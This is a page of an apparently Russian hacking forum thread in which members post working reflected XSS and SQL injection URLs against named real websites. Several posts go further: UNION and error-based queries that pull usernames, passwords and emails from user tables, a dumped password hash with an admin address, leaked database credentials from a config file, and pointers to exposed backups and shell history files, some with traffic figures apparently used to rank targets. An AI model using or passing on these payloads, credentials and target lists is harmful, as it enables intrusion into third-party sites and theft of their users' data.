Уязвимости SQLi, XSS и другие.

Discussion in 'Песочница' started by Егорыч+++, 10 May 2015.

Page 10 of 18
  1. SaNDER

    SaNDER Banned

    Joined:
    9 Jul 2015
    Messages:
    213
    Likes Received:
    15
    Reputations:
    3
    Ссылка:eek:nlinetrade.ru
    Тип: Полу-активная,действует некоторое время,потом надо снова вбивать урл со скриптом .
    Code:
    www.onlinetrade.ru/member/login?url=%2522%253E%253Cscript%253Ealert()%253C%2fscript%253E&c=399581"><script>alert("WH")</script>>
     
    #181 SaNDER, 15 Sep 2015
  2. SaNDER

    SaNDER Banned

    Joined:
    9 Jul 2015
    Messages:
    213
    Likes Received:
    15
    Reputations:
    3
    Ссылка: patee.ru
    Тип:XSS-Reflected
    Code:
    "><script>alert("WH")</script>
    Регистрируемся,создаем рецепт
    Вбиваем в "Названии блюда" "Описание блюда" скрипт и ещё в "Стадия приготовления"
    Там где число пропорции пишем любое число(только не сильно большое)
    "Время приготовления в минутах " так же .
    Не забудьте добавить ингредиенты(!),любые на рандом(я выбирал 4 штуки) .
    После отправляем и видим XSS-Reflected .
     
    #182 SaNDER, 15 Sep 2015
  3. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    разберитесь с определениями.
     
    _________________________
    #183 yarbabin, 15 Sep 2015
  4. tipa_cracker

    tipa_cracker New Member

    Joined:
    15 Sep 2015
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    #184 tipa_cracker, 16 Sep 2015
  5. DDShadoww

    DDShadoww New Member

    Joined:
    14 Jul 2015
    Messages:
    11
    Likes Received:
    4
    Reputations:
    2
    Target: alfa.com.tw
    Type: XSS Reflected

    Code:
    http://www.alfa.com.tw/search.php?keyword="><script>alert(1)</script>
    А для Safari, Chrome работает iframe если будет присутствовать закрывающий тэг.
     
    #185 DDShadoww, 19 Sep 2015
  6. Filipp

    Filipp Elder - Старейшина

    Joined:
    10 May 2015
    Messages:
    257
    Likes Received:
    57
    Reputations:
    31
    XSS-reflected:
    Code:
    www.topglobus.ru/sachy/ridici/sachy-hra2.php?id=4181471&pozz=4'%22()%26%25<acx><ScRiPt%20>prompt(935766)</ScRiPt>
     
    #186 Filipp, 19 Sep 2015
  7. joelblack

    joelblack Reservists Of Antichat

    Joined:
    6 Jul 2015
    Messages:
    244
    Likes Received:
    450
    Reputations:
    145
    target: http://www.unifinbank.ru/
    type: XSS Reflected
    Строка поиска:
    Code:
    "><script>alert('hello')</script>
     
    #187 joelblack, 20 Sep 2015
  8. R3hab

    R3hab Member

    Joined:
    17 May 2015
    Messages:
    116
    Likes Received:
    8
    Reputations:
    6
    STREIT Group - Armored Cars Manufacturer
    HTML:
    http://www.armored-cars.com/vehicle/view_add.php?vid=-7%20/*!50000union*/%20distinct%20select%201,2,3,4,5,version(),7,8,9
    ТИЦ 30
    PR 3
    AR 969,040
    5.5.42-MariaDB-cll-lve

    Make Free Bitcoin
    HTML:
    http://www.makefreebitco.in/news.php?id=-5'%20/*!50000union*/%20distinct%20select%201,version(),3,4--+f

    AR 149,492
    5.5.42-37.1
    Трафф 140K

    SMS PARIAZ - Accueil
    Joomla кому надо,добьет
    HTML:
    http://www.smspariaz.com/race/turf2.php?mid=-7%20union%20select%201,2,version(),4,5,6,7,8,9,10,11,12--+f

    PR 2
    AR 322,679
    5.6.23
    Трафф 120K
     
    #188 R3hab, 22 Sep 2015
    Last edited: 22 Sep 2015
    SaNDER likes this.
  9. DDShadoww

    DDShadoww New Member

    Joined:
    14 Jul 2015
    Messages:
    11
    Likes Received:
    4
    Reputations:
    2
    Target: 220-volt.ru
    Type: XSS Reflected

    Code:
    www.220-volt.ru/search/?q=</script><script>confirm(1)</script>
     
    #189 DDShadoww, 22 Sep 2015
  10. tipa_cracker

    tipa_cracker New Member

    Joined:
    15 Sep 2015
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Мне кажется что тут ( http://www.girlplays.ru/ ) уязвимости в поисковике 0 ...
     
    #190 tipa_cracker, 25 Sep 2015
  11. ocheretko

    ocheretko Banned

    Joined:
    15 May 2010
    Messages:
    144
    Likes Received:
    51
    Reputations:
    116
    Так и есть.
    Code:
    $P$BVX.b8gaC9KdVELsexne9KZawfO70G0 | admin  | [email protected]

  Method: POST
  Type: UNION query
  Title: MySQL UNION query (random number) - 7 columns
  Payload: search=-8718') UNION ALL SELECT CONCAT(0x717a707171,0x7a507250687641477a52,0x7170626a71),1342,1342,1342,1342,1342,1342#&submit_s=
    Code:
    define('DB_USER', 'root');
define('DB_PASSWORD', '89039486893');
define('DB_HOST', 'localhost');
     
    #191 ocheretko, 25 Sep 2015
    Last edited: 25 Sep 2015
  12. SaNDER

    SaNDER Banned

    Joined:
    9 Jul 2015
    Messages:
    213
    Likes Received:
    15
    Reputations:
    3
    Target:
    Code:
    _ttp://good-steam.ru/backup.zip .
    .
    Type:Backup .
     
    #192 SaNDER, 29 Sep 2015
    Last edited: 3 Oct 2015
  13. SaNDER

    SaNDER Banned

    Joined:
    9 Jul 2015
    Messages:
    213
    Likes Received:
    15
    Reputations:
    3
    Target:salrium.ru
    Type : XSS - Reflected .
    Code:
    salrium.ru/resp_block.php?id_goods=1728083"><script>alert("WH")</script>
или вот так 
http://salrium.ru/resp_block.php?id_goods=1728083%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt%28908717%29%3C/ScRiPt%3E&page=2 .
Можно и так salrium.ru/resp_block.php?id_goods="><script>alert("WH")</script>
     
    #193 SaNDER, 29 Sep 2015
  14. SaNDER

    SaNDER Banned

    Joined:
    9 Jul 2015
    Messages:
    213
    Likes Received:
    15
    Reputations:
    3
    Target:_ttp://steam-extra.ru/listing.php?category_id=40049
    Type:XSS-Reflected
    Code:
    "><script>alert("WH")</script>
    или
    Code:
    '"()&%<acx><ScRiPt >prompt(916773)</ScRiPt>
    Или свой .
     
    #194 SaNDER, 29 Sep 2015
    Last edited: 3 Oct 2015
  15. zigen

    zigen New Member

    Joined:
    25 May 2015
    Messages:
    4
    Likes Received:
    0
    Reputations:
    1
    Target: http://www.archetype.co.uk/search.php
    Type:XSS-Reflected
    Code:
    "><script>alert("OOPS")</script>


    Но там кажется можно еще и SQLi раскрутить, ошибка по строкой поиска
     
    #195 zigen, 6 Oct 2015
  16. AlexG

    AlexG Member

    Joined:
    26 Sep 2015
    Messages:
    57
    Likes Received:
    12
    Reputations:
    5
    Вы правы:

    Target: archetype.co.uk
    Type:SQLi error based
    Exploit:
    Code:
    Get: http://www.archetype.co.uk/search.php
Post-data: search=123" and extractvalue(0x0a,concat(0x0a,(select concat(version(),0x3a,database(),0x3a,current_user)))) and 1="1 -- &submit.x=91&submit.y=9&status[]=Recent&status[]=Current&status[]=Forthcoming
    DB-name: archetyp_db
    DB-user: archetype
    Version: 5.1.73-cll
    P.S. Возможно есть более изящное решение, но у меня получилось так :)

    UPD Поковыряв руками выяснилось, что пассы в мд5 и в вывод тупо не влазят (ограничение способа в 31 символ). Нашел такое решение (лимит 64 символа):
    Code:
    Get: http://www.archetype.co.uk/search.php
Post-data: search=123" and (select 1 from (Select count(*),Concat((select database()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y) x) and 1="1 -- &submit.x=91&submit.y=9&status[]=Recent&status[]=Current&status[]=Forthcoming
     
    #196 AlexG, 6 Oct 2015
    Last edited: 9 Oct 2015
  17. ubepkr

    ubepkr Member

    Joined:
    17 Aug 2015
    Messages:
    96
    Likes Received:
    20
    Reputations:
    1
    Target: http://www.gaspforair.org
    Уязвимость:SQLi
    Code:
    http://www.gaspforair.org/gasp/gedc/artcl-new.php?ID=115 +UNION+ALL+SELECT+1,(SELECT(@x)FROM(SELECT(@x:=0x00) ,(SELECT(@x)FROM(housing_user)WHERE(@x)IN(@x:=CONCAT(0x20,@x,userlevel,0x3a,username,0x3a,password,0x3c62723e))))x),3,4,5--
    Target: http://www.sequentialtart.com
    Уязвимость:SQLi
    Code:
    http://www.sequentialtart.com/article.php?id=-445+UNION+ALL+SELECT+1,2,3,4,(SELECT(@x)FROM(SELECT(@x:=0x00),(SELECT(@x)FROM(seqtartprod.IPM_users)WHERE(@x)IN(@x:=CONCAT(0x20,@x,username,0x3a,password,0x3a,email,0x3c62723e))))x),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--
    Вот прогнал последнюю DirB'ом, удивился: http://www.sequentialtart.com/.bash_history и http://www.sequentialtart.com/.mysql_history
    чО уж там, /etc/shadow надо в общий доступ!)))


    Добавлю:
    Target: http://yrmusic.com
    Уязвимость:SQLi
    Code:
    http://yrmusic.com/v2/artists/bios/artist.php?ID=-84+UNION+ALL+SELECT+1,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--
    Target: http:http://www.zam.it
    Уязвимость:SQLi
    Code:
    http://www.zam.it/home.php?id_autore=234 +UNION+ALL+SELECT+1,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),3,4,5,6,7,8,9,10 --
    Оффтоп про вышеуказанный адрес: параллельно с Лисой (хакбар с Диосами), то ли с бодуна, то ли просто от лени, запустил Havij. Дык вот (это не первое наблюдение), он, не поверите, врет)) Не верьте Havij'у ибо он утверждает, что здесь 2 таблицы, а на самом деле, их 10)) Попробуйте последний адрес через запрос и через сию программулину))

    Target: http:http://sh.newsun.dk
    Уязвимость:SQLi
    Code:
    http://sh.newsun.dk/vis.php?id=189+UNION+ALL+SELECT+1,2,3,4,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),6,7,8--
     
    #197 ubepkr, 13 Oct 2015
    Last edited: 13 Oct 2015
  18. R3hab

    R3hab Member

    Joined:
    17 May 2015
    Messages:
    116
    Likes Received:
    8
    Reputations:
    6
    DUS Architects Amsterdam
    Type:SQLi
    HTML:
    http://www.dusarchitects.com/news.php?newsid=-8%27%20union%20select%201,2,3,version(),5,6,7--+f
    ТИЦ 20
    PR 5
    5.6.23-LOG
     
    #198 R3hab, 17 Oct 2015
  19. DDShadoww

    DDShadoww New Member

    Joined:
    14 Jul 2015
    Messages:
    11
    Likes Received:
    4
    Reputations:
    2
    Target: http://motivtelecom.ru
    Type: XSS Reflected

    Code:
    motivtelecom.ru/sverdlovsk-oblast/search?search_text="><script>alert(1)<%2Fscript>
     
    #199 DDShadoww, 22 Oct 2015
  20. R3hab

    R3hab Member

    Joined:
    17 May 2015
    Messages:
    116
    Likes Received:
    8
    Reputations:
    6
    YogaBugs
    Type : SQLi
    HTML:
    http://www.yogabugs.com/shop_item.php?id=-3%20union%20select%201,2,version(),4,5,6,7,8,9,10,11--+f
    PR 3
    5.5.44-0ubuntu0.14.04.1
     
    #200 R3hab, 23 Oct 2015
(You must log in or sign up to post here.)
Page 10 of 18
Loading...
Similar Threads - Уязвимости SQLi
  1. zase

    массовый взлом сайтов

    zase, 25 Dec 2022, in forum: Песочница
    Replies:
    1
    Views:
    3,531
    lifescore
    14 Jan 2023
  2. Shadows_God

    Взлом сайтов

    Shadows_God, 20 Nov 2022, in forum: Песочница
    Replies:
    14
    Views:
    8,002
    CyberTro1n
    4 May 2024
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.